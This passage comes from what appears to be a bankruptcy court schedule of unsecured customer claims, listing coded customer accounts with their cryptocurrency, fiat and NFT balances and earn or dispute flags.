| 07325929 | | BAT[1], BRZ[1], CUSDT[1], DOGE[3331.05554026], USD[0.00] | | |
| 07325931 | | USD[10.00] | | |
| 07325933 | | USD[0.01] | | |
| 07325934 | | USD[0.01] | | |
| 07325935 | | SOL[.47659806], USD[0.00] | | |
| 07325937 | | USD[10.00] | | |
| 07325939 | | ETH[.03159348], SHIB[9], USD[0.13] | Yes | |
| 07325940 | | USD[0.00], YFI[.00020422] | | |
| 07325941 | | USD[0.00] | | |
| 07325942 | | USD[10.00] | | |
| 07325943 | | USD[10.00] | | |
| 07325944 | | USD[10.00] | | |
| 07325945 | | USD[10.00] | | |
| 07325947 | | DOGE[8.68706402], USD[0.00] | | |
| 07325948 | | USD[10.00] | | |
| 07325950 | | BTC[.00047716], CUSDT[1], DOGE[972.5315604], ETH[.00273205], ETHW[.00273205], SHIB[2], TRX[65.39807339], USD[0.00] | | |
| 07325951 | | BAT[14.55045739], BF_POINT[200], BRZ[1], DOGE[3.000548], ETHW[.07769751], SUSHI[1.1065761], TRX[919.81224958], USD[0.00] | Yes | |
| 07325952 | | BCH[0], BRZ[0], DOGE[1], SHIB[0], SUSHI[0], USD[0.08], USDT[0] | Yes | |
| 07325953 | | USD[10.00] | | |
| 07325956 | | BRZ[2], DOGE[4], NFT (521506359741625119/FTX - Off The Grid Miami #434)[1], USD[0.00] | Yes | |
| 07325957 | | USD[0.00] | Yes | |
| 07325958 | | CUSDT[4], DOGE[1284.38760953], TRX[1], USD[0.01] | | |
| 07325959 | | DOGE[136.85598822], USD[0.00] | | |
| 07325962 | | USD[10.00] | | |
| 07325963 | | USD[10.00] | | |
| 07325964 | | USD[10.00] | | |
| 07325966 | | BRZ[1], CUSDT[1], DOGE[.00002821], TRX[1], USD[0.00] | | |
| 07325967 | | USD[10.00] | | |
| 07325969 | | SHIB[159571.74562063], USD[0.00] | Yes | |
| 07325970 | | USD[0.00] | Yes | |
| 07325971 | | BAT[76.52966462], BTC[0], CUSDT[3], DOGE[0], SUSHI[0], TRX[2], UNI[0], USD[19.02] | Yes | |
| 07325973 | | USD[10.00] | | |
| 07325974 | | USD[10.00] | | |
| 07325975 | | AAVE[.00000011], CUSDT[130.07295734], MKR[.00000001], USD[0.00], USDT[0] | Yes | |
| 07325976 | | USD[10.51] | Yes | |
| 07325977 | | DOGE[147.06977503], TRX[1], USD[0.00] | | |
| 07325979 | | USD[10.00] | | |
| 07325980 | | BRZ[0], DOGE[0.00000232], USD[0.00], USDT[0] | | |
| 07325981 | | CUSDT[1], USD[0.06], USDT[0] | Yes | |
| 07325982 | | USD[10.00] | | |
| 07325983 | | BTC[.00000115], USD[0.00] | | |
| 07325984 | | TRX[1], USD[0.00] | | |
| 07325985 | Contingent, Disputed | BRZ[0], BTC[0], DOGE[0], ETH[0], LINK[0], TRX[0], USD[0.00] | Yes | |
| 07325986 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07325987 | | USD[0.00] | | |
| 07325988 | | BTC[0], SOL[0.16483250], USD[0.00] | | |
| 07325989 | | USD[0.00] | | |
| 07325991 | | BAT[1], DOGE[3], USD[0.01], USDT[0] | | |
| 07325992 | | USD[11.05] | Yes | |
| 07325993 | | BRZ[3], CUSDT[9], DOGE[8.46554601], ETH[.04620142], ETHW[0], SHIB[1], SOL[.00000987], TRX[7], USD[0.00] | Yes | |
| 07325994 | | BRZ[1], CUSDT[3], DOGE[5127.5379915], GRT[25.35150624], SOL[.66268852], TRX[2], USD[5.00] | | |
| 07325995 | | CUSDT[1], USD[0.00] | | |
| 07325996 | | USD[10.00] | | |
| 07325997 | | DOGE[0], USD[0.00] | | |
| 07325998 | | USD[10.62] | Yes | |
| 07325999 | | USD[10.00] | | |
| 07326000 | | CUSDT[1], ETH[0], SOL[0], SUSHI[0.0], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07326001 | | BTC[0.00095592], DOGE[0], ETH[0.00179157], ETHW[0.00179157], GRT[0], KSHIB[0], NFT (435116535595472917/FTX - Off The Grid Miami #14)[1], NFT (48594904314334811/FTX - Off The Grid Miami #2294)[1], USD[0.00] | | |
| 07326002 | | AAVE[0], BAT[0], BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0], ETHW[0], EUR[0.00], GRT[0], LINK[0], NFT (290860721010147056/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #51)[1], NFT (454373432998440552/Sandra Cast In Gold)[1], NFT (483180798768430416/Hall of Fantasy League #192)[1], NFT (528569380157847852/Big chips )[1], PAXG[0], SOL[0], SUSHI[0], TRX[0], USD[5.55] | Yes | |
| 07326003 | | BTC[.00000036], DOGE[467.54795724], USD[0.00] | Yes | |
| 07326005 | | USD[10.00] | | |
| 07326007 | | BRZ[1], CUSDT[5], TRX[2], USD[0.00] | | |
| 07326008 | | BRZ[1], DOGE[1], SOL[0], USD[0.00] | | |
| 07326009 | | CUSDT[8], TRX[2], USD[0.00] | | |
| 07326010 | | MATIC[4.09636126], TRX[1], USD[0.17] | Yes | |
| 07326011 | | CUSDT[2], DOGE[2], USD[0.00] | | |
| 07326012 | | DOGE[519.54785084] | | |
| 07326013 | | SHIB[2395215.33024135], USD[0.00] | | |
| 07326014 | | DOGE[1779.97853736], USD[0.00] | | |
| 07326015 | | BRZ[0], DOGE[41734.98931305], ETH[.00512126], ETHW[.00505286], SOL[6.74119437], TRX[504.42221768], USD[10.31] | Yes | |
| 07326016 | | DOGE[4156.91065041], USD[10.00] | | |
| 07326017 | | TRX[171.84782119], USD[0.00] | | |
| 07326018 | | USD[10.00] | | |
| 07326019 | | AAVE[0], ALGO[0], BAT[0], BCH[0], DOGE[6], GRT[0], LINK[0], SHIB[29425292.03626195], SOL[0], SUSHI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07326022 | | CUSDT[2], USD[0.01] | Yes | |
| 07326024 | | USD[10.00] | | |
| 07326025 | | CUSDT[1], DOGE[189.95743549], SHIB[441371.19317345], USD[0.00] | | |
| 07326026 | | DOGE[1], USD[0.00], USDT[0] | | |
| 07326027 | | LINK[.0016518], SHIB[1], USD[7.85], USDT[0.00000001] | Yes | |
| 07326028 | | USD[11.02] | Yes | |
| 07326029 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07326030 | | CUSDT[2.988], TRX[2230.282275], USD[0.54] | | |
| 07326031 | | USD[10.00] | | |
| 07326032 | | USD[0.00] | | |
| 07326033 | | USD[10.00] | | |
| 07326034 | | DOGE[0], ETH[0], ETHW[0], SOL[0] | | |
| 07326035 | | USD[10.00] | | |
| 07326037 | | BTC[0], DOGE[1], USD[0.00], USDT[0] | | |
| 07326038 | | USD[10.00] | | |
| 07326039 | | BTC[.0045059], DOGE[2.00015486], USD[10.27] | | |
| 07326040 | | DOGE[2.0000305], TRX[.64708271], USD[0.01] | | |
| 07326043 | | DOGE[.28409501], USD[16.95] | | |
| 07326044 | | CUSDT[1], DOGE[.00007836], GRT[6.78297881], TRX[2], USD[0.00] | | |
| 07326045 | | BRZ[1], DOGE[3892.54885023], NFT (371003211974142878/Tasty Cocktail)[1], NFT (422209286837045659/The  City's River)[1], NFT (433751721420017750/Jellyfish)[1], NFT (487245236101123882/Don't Spill my Drink! )[1], NFT (488055668258952398/#3 of 3)[1], SOL[6.80044288], TRX[8376.17696123], USD[0.00], USDT[1.08215942] | Yes | |
| 07326046 | | CUSDT[2], TRX[80.35894335], USD[0.01] | | |
| 07326047 | | USD[10.00] | | |
| 07326048 | | USD[10.00] | | |
| 07326049 | | BTC[.00023903], USD[0.00] | | |
| 07326050 | | DOGE[132.41858574], USD[0.00] | | |
| 07326052 | | BRZ[4], CUSDT[18], TRX[3], USD[0.00] | | |
| 07326053 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326054 | | CUSDT[1], DOGE[0], USD[0.00], USDT[0] | | |
| 07326055 | | USD[10.00] | | |
| 07326056 | | BRZ[1], CUSDT[3.17748866], DOGE[1], TRX[1.85968694], USD[0.00], USDT[0.87261242] | Yes | |
| 07326057 | | USD[10.00] | | |
| 07326059 | | DOGE[1206.91363010], TRX[1], USD[10.00] | | |
| 07326060 | | BAT[1.0165555], BTC[.00017713], CUSDT[2], DOGE[5211.37976198], ETH[1.24500154], ETHW[1.24446716], GRT[1.00404471], TRX[1], USD[1.64], USDT[1.10195542] | Yes | |
| 07326061 | | BTC[0], DOGE[.891], USD[51.55] | | |
| 07326062 | | USD[10.00] | | |
| 07326063 | | USD[10.00] | | |
| 07326064 | | DOGE[1155.23536976] | | |
| 07326065 | | BRZ[2], ETH[.00000047], ETHW[.05092004], SHIB[3], TRX[1], USD[444.23], USDT[0] | Yes | |
| 07326066 | | BAT[1.0165555], BRZ[1], CUSDT[8], USD[0.01] | Yes | |
| 07326067 | | USD[10.00] | | |
| 07326068 | | BRZ[2], CUSDT[86.54284088], DOGE[2], SUSHI[31.48309407], TRX[4], USD[0.00] | Yes | |
| 07326069 | | CUSDT[2], DOGE[.00789146], USD[10.00] | | |
| 07326070 | | USD[10.00] | | |
| 07326071 | | USD[11.02] | Yes | |
| 07326072 | | BTC[.00000163], USD[0.00] | | |
| 07326074 | | CUSDT[4], USD[0.21] | | |
| 07326075 | | CUSDT[1], DOGE[.68597694], TRX[1], USD[1.83] | | |
| 07326076 | | DOGE[2.0078699], USD[0.24] | | |
| 07326078 | | USD[10.00] | | |
| 07326079 | | USD[10.00] | | |
| 07326080 | | DOGE[0], USD[0.00], USDT[1] | | |
| 07326081 | | DOGE[173.80477066], USD[0.00] | | |
| 07326082 | | USD[20.00] | | |
| 07326083 | | USD[10.00] | | |
| 07326084 | | USD[10.00] | | |
| 07326086 | | USD[10.00] | | |
| 07326089 | | BTC[.00827377], CUSDT[3], DOGE[8437.55014083], ETH[.28502101], ETHW[.28502101], TRX[1], USD[0.00] | | |
| 07326090 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07326092 | | DOGE[.195], GRT[.842], USD[0.00] | | |
| 07326093 | | BAT[1], CUSDT[3], DOGE[8450.29299486], SHIB[8444519.50684006], TRX[2], USD[0.00] | | |
| 07326094 | | BRZ[1], BTC[0], DOGE[0], ETH[0], SHIB[1], SUSHI[0], TRX[0], USD[1.41] | Yes | |
| 07326096 | | DAI[10.976008], DOGE[654.96470845], TRX[65.40608077], USD[0.00] | Yes | |
| 07326097 | | BRZ[2], CUSDT[2], DOGE[7], TRX[1], USD[0.00] | | |
| 07326098 | | USD[10.00] | | |
| 07326099 | | CUSDT[10], TRX[2], USD[0.00] | | |
| 07326101 | | USD[10.00] | | |
| 07326102 | | BRZ[1], BTC[.09179084], CUSDT[2], DOGE[6517.85744259], ETH[.19846768], ETHW[.19825772], EUR[501.39], PAXG[.12045461], TRX[4], USD[0.00] | Yes | |
| 07326103 | | USD[16.40] | | |
| 07326105 | | USD[10.00] | | |
| 07326108 | | DOGE[20.86467844], USD[0.00] | Yes | |
| 07326111 | | USD[10.00] | | |
| 07326112 | | USD[10.00] | | |
| 07326114 | | BRZ[0], USD[0.00], USDT[0] | | |
| 07326116 | | CUSDT[1], USD[0.00] | | |
| 07326117 | | USD[10.00] | | |
| 07326119 | | ETH[.00000001], ETHW[0], USD[0.00] | Yes | |
| 07326120 | | BRZ[2], CUSDT[1], DOGE[10707.48797424], SHIB[759343.43015919], USD[6.22] | Yes | |
| 07326121 | | DOGE[1.00055154], GRT[.00039277], SOL[.00045015], USD[0.00] | | |
| 07326122 | | USD[10.00] | | |
| 07326124 | | CUSDT[1], DOGE[1247.1489229], SHIB[2923019.20002918], USD[0.00] | | |
| 07326125 | | DOGE[0], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07326127 | | USD[0.00] | | |
| 07326128 | | DOGE[22.81089539], USD[0.00] | | |
| 07326129 | | DOGE[1], USD[0.01] | | |
| 07326131 | | CUSDT[714.17671476], DOGE[.00004579], SHIB[2398921.51294019], TRX[806.58627133], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326132 | | USD[0.00], YFI[.00021482] | | |
| 07326133 | | DOGE[6.95915468], SOL[1.25946952], USD[0.00] | | |
| 07326134 | | BRZ[1], DOGE[1], ETH[0], ETHW[2.10826769], TRX[2], USD[0.00], USDT[1] | | |
| 07326136 | | USD[10.00] | | |
| 07326137 | | BTC[.00004814], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07326138 | | USD[10.00] | | |
| 07326140 | | USD[10.00] | | |
| 07326141 | | DOGE[.62], USD[0.00], USDT[0] | | |
| 07326142 | | TRX[196.82954836], USD[0.00] | | |
| 07326143 | | BTC[.00018007], CUSDT[2], DOGE[583.3623289], ETH[.00456369], ETHW[.00456369], USD[0.00] | | |
| 07326144 | | CUSDT[4], DOGE[70.95250795], USD[0.00] | | |
| 07326145 | | DOGE[46.98233849], USD[0.00] | | |
| 07326147 | | USD[10.00] | | |
| 07326148 | | USD[11.08] | Yes | |
| 07326150 | | USD[10.00] | | |
| 07326151 | | USD[10.00] | | |
| 07326152 | | USD[0.00] | | |
| 07326153 | | USD[10.00] | | |
| 07326154 | | BCH[.01875248], USD[0.00] | | |
| 07326156 | | DOGE[4], USD[0.01] | | |
| 07326157 | | CUSDT[6], DOGE[1], LTC[.01153526], TRX[2], USD[0.01] | | |
| 07326158 | | CUSDT[4], USD[0.00] | | |
| 07326159 | | BTC[0], DOGE[0], USD[10.00] | | |
| 07326160 | | DOGE[0], UNI[15.85397088], USDT[0] | | |
| 07326161 | | DOGE[177.795], USD[0.08] | | |
| 07326162 | | BF_POINT[200], CUSDT[1], NFT (522162442589536448/Saudi Arabia Ticket Stub #617)[1], SUSHI[0], USD[0.00] | Yes | |
| 07326163 | | DOGE[0], LTC[0] | | |
| 07326164 | | USD[10.00] | | |
| 07326165 | | USD[10.00] | | |
| 07326166 | | USD[10.00] | | |
| 07326169 | | CUSDT[2], GRT[1.00498957], USD[0.00] | Yes | |
| 07326170 | | USD[10.00] | | |
| 07326172 | | USD[11.09] | Yes | |
| 07326173 | | BTC[0], ETH[0], USD[0.06] | | |
| 07326174 | | CUSDT[2], SHIB[1], TRX[1357.35039279], USD[0.00] | Yes | |
| 07326175 | | BTC[.00020934], CUSDT[3], DOGE[1431.50131109], ETH[.06003197], ETHW[.05928627], UNI[1.10902204], USD[3.23] | Yes | |
| 07326176 | | DOGE[843.45719243], USD[0.01] | Yes | |
| 07326178 | | BAT[15.89473261], USD[0.00] | | |
| 07326180 | | CUSDT[2], DOGE[355.69060957], ETH[.00742382], ETHW[.00742382], USD[0.81] | | |
| 07326181 | | CUSDT[1], TRX[5.44762974], USD[0.00] | | |
| 07326182 | | USD[10.00] | | |
| 07326183 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07326184 | | USD[0.00] | | |
| 07326185 | | DOGE[1], USD[0.00] | | |
| 07326186 | | USD[10.00] | | |
| 07326187 | | USD[10.00] | | |
| 07326189 | | USD[10.00] | | |
| 07326190 | | USD[10.00] | | |
| 07326191 | | CUSDT[3], DOGE[3097.44836810], SOL[.36898249], TRX[2], USD[0.02] | Yes | |
| 07326192 | | MATIC[9.76720101], USD[0.00] | | |
| 07326193 | | BRZ[1], USD[19.66] | | |
| 07326194 | | BTC[.00141], DOGE[16158.45219519], ETH[0], TRX[1], USD[0.00] | | |
| 07326195 | | USD[10.00] | | |
| 07326196 | | USD[10.00] | | |
| 07326199 | | CUSDT[1], DOGE[1], USD[0.05] | | |
| 07326200 | | BRZ[1], CUSDT[2], DOGE[22124.9499943], TRX[2], USD[0.00], USDT[1] | | |
| 07326201 | | USD[10.00] | | |
| 07326202 | | BTC[0], DOGE[0], GRT[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326204 | | USD[10.00] | | |
| 07326205 | | CUSDT[1], USD[0.00] | | |
| 07326207 | | PAXG[.00534945], USD[0.00] | | |
| 07326208 | | DOGE[0.01685005], USD[0.00] | Yes | |
| 07326209 | | DOGE[3], USD[10.00] | | |
| 07326211 | | BTC[0], ETH[0], LTC[0], SHIB[5], SOL[0], SUSHI[0], USD[0.00] | Yes | |
| 07326213 | | USD[10.00] | | |
| 07326214 | | BRZ[1], CUSDT[3], TRX[1], USD[0.00] | Yes | |
| 07326215 | | USD[10.00] | | |
| 07326216 | | USD[10.00] | | |
| 07326217 | | BRZ[1], CUSDT[5], DOGE[3], TRX[1], USD[0.01], USDT[1] | | |
| 07326218 | | CUSDT[3], DOGE[178.35771494], USD[0.00] | | |
| 07326219 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07326220 | | DOGE[.07057578], USD[0.00] | Yes | |
| 07326221 | | USD[0.02] | | |
| 07326222 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07326223 | | BAT[1], BRZ[3], BTC[.00000227], CUSDT[8], DOGE[2.27023321], EUR[0.01], TRX[1.6937979], USD[0.45] | | |
| 07326224 | | USD[10.00] | | |
| 07326225 | | USD[10.00] | | |
| 07326227 | | DOGE[1], USD[0.01] | Yes | |
| 07326228 | | USD[0.00] | | |
| 07326229 | | BRZ[2], CUSDT[2], USD[0.00] | | |
| 07326230 | | BAT[8.41692716], BCH[.03940922], CUSDT[4], DOGE[265.84475333], ETH[.0211467], ETHW[.0211467], LTC[.18070155], TRX[1], USD[100.00] | | |
| 07326231 | | CUSDT[7], USD[0.00], YFI[.00070751] | Yes | |
| 07326232 | | BCH[0], DOGE[0.03022184], ETH[0], ETHW[0], SHIB[5009913.49840411], TRX[1], USD[183.41] | Yes | |
| 07326233 | | USD[0.00] | | |
| 07326234 | | USD[10.00] | | |
| 07326235 | | USD[10.00] | | |
| 07326236 | | BRZ[1], CUSDT[3], DOGE[1.00002887], SHIB[4108463.43467543], USD[0.01] | | |
| 07326237 | | USD[10.00] | | |
| 07326238 | | USD[10.00] | | |
| 07326239 | | USD[10.00] | | |
| 07326240 | | USD[0.00] | | |
| 07326241 | | USD[10.00] | | |
| 07326242 | | USD[10.00] | | |
| 07326243 | | USD[10.00] | | |
| 07326244 | | CUSDT[1], DOGE[1177.66967626], TRX[1], USD[0.00] | | |
| 07326245 | | USD[10.00] | | |
| 07326246 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07326247 | | BTC[.0000212], DOGE[.223], USD[0.38] | | |
| 07326250 | | CUSDT[2], TRX[2], USD[0.01] | | |
| 07326252 | | DOGE[6513.27063382], USD[20.56] | | |
| 07326254 | | BTC[0], DOGE[.64165399], USD[0.00] | | |
| 07326255 | | CUSDT[4], DOGE[79.94794232], TRX[269.23099418], USD[0.01] | Yes | |
| 07326256 | | DOGE[428.01092596], USD[0.00] | | |
| 07326257 | | ETH[.00102279], ETHW[.00102279], USD[0.00], USDT[0] | | |
| 07326258 | | SHIB[22770.13290398], USD[0.00] | | |
| 07326259 | | BRZ[7.36300145], CUSDT[13], DOGE[5.03291493], ETHW[.83264279], LINK[87.58824334], NEAR[.00254912], NFT [3075909786923085[52/Del Piero][1], NFT [314317962348989066/Contemporary #19][1], NFT [318841067956864714/Chitto #16][1], NFT [350404502069144855/Godfather][1], NFT [358067317682619656/Z - Town #3][1], NFT [389717147952410241/My Habitat #03][1], NFT [425974155768283624/GalaxyKoalas # 568][1], NFT [426203006537717389/Halloween Four][1], NFT [445722466472664298/Hand Of God][1], NFT [458470508549196570/Metaverse Rooms #6][1], NFT [468584406395888219/Metaverse Rooms #2][1], NFT [483760055380642274/Brick World #24][1], NFT [486795083193949136/Brick World #2][1], NFT [488348851137094637/Robocop][1], NFT [497727100484225329/Vox World #15][1], NFT [506031755594380334/Solana Special Edition][1], NFT [520267613S29211211/Guilit][1], NFT [547796332390050705/Dragon Avatar  #9][1], NFT [553020081237655467/Tony Hawk][1], NFT [554695682420121828/Starwars][1], NFT [565628036447600873/Indiana Jones][1], SOL[.00034009], SUSHI[136.49071598], TRX[0.51562383], USD[76.76], USDT[4.30807913] | Yes | |
| 07326260 | | CUSDT[2], SHIB[223366.4943219], USD[0.29] | Yes | |
| 07326261 | | USD[10.00] | | |
| 07326262 | | BAT[1], CUSDT[2], GRT[1], TRX[1], USD[0.27] | | |
| 07326263 | | USD[0.01] | | |
| 07326264 | | USD[0.00] | Yes | |
| 07326266 | | USD[0.00] | | |
| 07326267 | | BAT[0], TRX[.8174], USD[1.13], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326268 | | USD[10.00] | | |
| 07326269 | | CUSDT[2], DOGE[451.67536327], USD[0.00] | Yes | |
| 07326270 | | UNI[23.70956], USD[405.96] | | |
| 07326271 | | USD[10.00] | | |
| 07326272 | | CUSDT[2], SHIB[1], TRX[1], USD[0.01] | | |
| 07326273 | | USD[10.00] | | |
| 07326274 | | ETH[0], USD[1229.44] | | |
| 07326275 | | USD[0.00] | | |
| 07326276 | | BRZ[2], CUSDT[2], GRT[1.00498957], TRX[3], USD[0.01], USDT[0] | Yes | |
| 07326278 | | USD[10.00] | | |
| 07326279 | | CUSDT[2], DOGE[2439.31461564], TRX[532.0900659], USD[0.00] | Yes | |
| 07326281 | | CUSDT[4.0006218], DOGE[.00002131], ETH[.00790935], ETHW[.00781359], KSHIB[577.20291779], TRX[.00067852], USD[0.00] | Yes | |
| 07326282 | | USD[0.00] | Yes | |
| 07326283 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], SHIB[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07326284 | | USD[10.00] | | |
| 07326285 | | BRZ[1], CUSDT[1], SHIB[1], TRX[1], USD[0.01] | | |
| 07326286 | | BRZ[5], CUSDT[4], DOGE[0], ETH[0], GRT[1], SHIB[1], SUSHI[0], USD[0.00], USDT[0.00001619] | | |
| 07326287 | | BTC[.00000126], DOGE[.431], USD[21.29] | | |
| 07326289 | | BRZ[3], CUSDT[11], GRT[4], TRX[1], USD[0.01] | | |
| 07326290 | | DOGE[1178.23955507], USD[0.00] | | |
| 07326291 | | BRZ[1], CUSDT[8], DOGE[1.00059299], SHIB[476296.20919334], USD[0.04] | Yes | |
| 07326292 | | BTC[0], DOGE[0], ETH[0.00974377], ETHW[0.00958731], MATIC[8.20000000], NFT [290065065784864108/Ballpark Bobblers 2022 - ID: BBF4CBB9][1], SOL[0], USD[4.01], USDT[0] | | ETH[.009505] |
| 07326293 | | BAT[1], GRT[9.2643848], USD[0.00] | | |
| 07326294 | | USD[0.00] | | |
| 07326295 | | DOGE[.07458997], ETH[0], USD[0.00] | | |
| 07326296 | | USD[10.00] | | |
| 07326297 | | BRZ[1], BTC[0.00000041], CUSDT[3], DOGE[1], TRX[2], USD[0.00], USDT[2.12368239] | Yes | |
| 07326298 | | CUSDT[2], DOGE[178.12228363], ETH[.00228705], ETHW[.00228705], SHIB[667884.80373568], TRX[129.43038593], USD[0.01] | | |
| 07326299 | | BAT[2], BRZ[1], CUSDT[2], DOGE[3.00423533], GRT[1], TRX[2], USD[0.00] | | |
| 07326300 | | USD[10.00] | | |
| 07326302 | Contingent, Disputed | USD[10.00] | | |
| 07326304 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07326305 | | BTC[.00287977], CUSDT[2], DOGE[1121.2896756], LTC[2.19646357], TRX[2], USD[0.01] | | |
| 07326306 | | USD[10.00] | | |
| 07326307 | | USD[10.00] | | |
| 07326308 | | CUSDT[1], DOGE[0], USD[0.01] | | |
| 07326309 | | BRZ[1], CUSDT[6], DOGE[0], SOL[0], TRX[1], USD[0.04], USDT[0] | | |
| 07326310 | | USD[10.00] | | |
| 07326311 | | DOGE[7], TRX[1], USD[10.00], USDT[.0000063] | | |
| 07326312 | | DOGE[55390.93266036], ETH[.04979819], ETHW[.04979819], USD[0.00], USDT[0] | | |
| 07326313 | | DOGE[.654], USD[0.00] | | |
| 07326314 | | TRX[189.83039991], USD[0.00] | | |
| 07326315 | | USD[10.00] | | |
| 07326316 | | CUSDT[1], USD[0.00] | | |
| 07326317 | | CUSDT[1], DOGE[1.06367544], USD[0.00] | | |
| 07326318 | | USD[11.05] | Yes | |
| 07326319 | | BRZ[1], CUSDT[2], DOGE[2527.86807711], TRX[1], USD[0.01] | | |
| 07326320 | | USD[10.00] | | |
| 07326321 | | USD[10.00] | | |
| 07326322 | | CUSDT[1], USD[0.01] | Yes | |
| 07326323 | | BRZ[2], CUSDT[4], TRX[1], USD[0.00] | | |
| 07326325 | | USD[10.00] | | |
| 07326326 | | TRX[48.58000605], USD[0.00] | | |
| 07326327 | | CUSDT[3], DOGE[53.95639737], USD[10.43] | | |
| 07326328 | | USD[10.00] | | |
| 07326329 | | USD[10.00] | | |
| 07326330 | | USD[10.00] | | |
| 07326331 | | USD[10.00] | | |

Amended Schedule F-12 priority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07326333 | | BRZ[1], CUSDT[5], DOGE[664.79088382], ETH[.0168495], ETHW[.0168495], LTC[.00001716], TRX[3], USD[0.00] | | |
| 07326334 | | USD[0.00] | | |
| 07326335 | | USD[10.00] | | |
| 07326336 | | DOGE[102.96327314], USD[10.01] | | |
| 07326337 | | USD[10.00] | | |
| 07326338 | | USD[10.00] | | |
| 07326339 | | USD[10.00] | | |
| 07326341 | | BAT[3], BRZ[2], BTC[.00833651], CUSDT[9], ETH[.07331127], ETHW[.07331127], GRT[2], KSHIB[421.75265219], SHIB[50420.16806722], TRX[3], USD[0.70] | | |
| 07326342 | | BAT[1], BRZ[1], CUSDT[2], DOGE[1], LTC[1.25676999], TRX[1], USD[0.01] | | |
| 07326345 | | DOGE[1], GRT[0], TRX[.26119271], USD[0.00] | | |
| 07326346 | | DOGE[0] | | |
| 07326347 | | BRZ[1], CUSDT[3], DOGE[4561.51169074], USD[11.44] | Yes | |
| 07326349 | | USD[10.00] | | |
| 07326350 | | USD[10.00] | | |
| 07326352 | | USD[10.00] | | |
| 07326353 | | USD[10.00] | | |
| 07326356 | | BTC[.00019779], USD[0.00] | | |
| 07326357 | | DOGE[68.83469334], USD[0.00] | | |
| 07326358 | | USD[10.00] | | |
| 07326359 | | BRZ[56.16821661], CUSDT[469.78285893], DOGE[947.52812473], ETH[.03563709], ETHW[.03563709], KSHIB[142.64224213], SHIB[285795.94169762], UNI[.79598375], USD[0.00] | | |
| 07326360 | | USD[10.00] | | |
| 07326362 | | USD[10.00] | | |
| 07326363 | | BTC[0], DOGE[0], LINK[0], NFT (477648144625647750/David #170)[1], SUSHI[0], USD[0.00] | | |
| 07326364 | | BTC[.00026622], DOGE[7.3384327Z], TRX[1], USD[50.96] | | |
| 07326365 | | USD[10.00] | | |
| 07326366 | | DOGE[48.76835043], USD[0.00] | | |
| 07326368 | | USD[10.00] | | |
| 07326370 | | USD[10.00] | | |
| 07326371 | | BAT[3.22330333], BRZ[2], BTC[0], CUSDT[48.76914071], DOGE[16.1309104], ETH[0], GRT[2.00498957], MATIC[.00012031], SHIB[11], SOL[0], SUSHI[0.00001232], TRX[20.86604255], UNI[.00039987], USDI[2.05], USDT[0.00000001] | Yes | |
| 07326373 | | USD[10.00] | | |
| 07326374 | | USD[10.00] | | |
| 07326375 | | DOGE[86.64654962], GRT[0], SHIB[506224.47498912], USD[0.00] | Yes | |
| 07326376 | | GRT[1.00313735], USD[0.01], USDT[0.00000001] | Yes | |
| 07326377 | | BTC[.00000002], DOGE[1], USD[72.20] | Yes | |
| 07326378 | | USD[10.00] | | |
| 07326379 | | USD[10.00] | | |
| 07326380 | | USD[10.00] | | |
| 07326381 | | USD[10.00] | | |
| 07326383 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07326384 | | USD[10.00] | | |
| 07326387 | | BTC[.00018386], USD[0.00] | | |
| 07326388 | | USD[10.00] | | |
| 07326389 | | DOGE[17.24814895], USD[0.00] | | |
| 07326390 | | USD[10.00] | | |
| 07326391 | | CUSDT[7], DOGE[1], GRT[0], LINK[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07326392 | | BAT[1], BRZ[2], CUSDT[13], DOGE[4], ETH[.21679581], ETHW[0.21679581], GRT[758.51884934], KSHIB[1706.36612781], LINK[20.54110013], MATIC[142.33887949], NFT (338781522909657768/Piano)[1], NFT (369099348134988799/BB Purple #3)[1], NFT (427441439083929605/Old Motorcycle )[1], NFT (511982452693280837/SketchArt #2)[1], SHIB[5127838.36732354], SOL[.5121724], SUSHI[62.11683907], TRX[7444.87788308], USD[2.36] | | |
| 07326393 | | USD[10.00] | | |
| 07326394 | | USD[10.00] | | |
| 07326395 | | BRZ[1], CUSDT[8], DOGE[1], TRX[4], USD[0.00] | | |
| 07326396 | | CUSDT[1], DOGE[3923.71703752], USD[0.00] | | |
| 07326397 | | USD[0.18] | | |
| 07326399 | | DOGE[175.95067469], USD[0.00] | | |
| 07326400 | | USD[10.00] | | |
| 07326402 | | USD[10.00] | | |
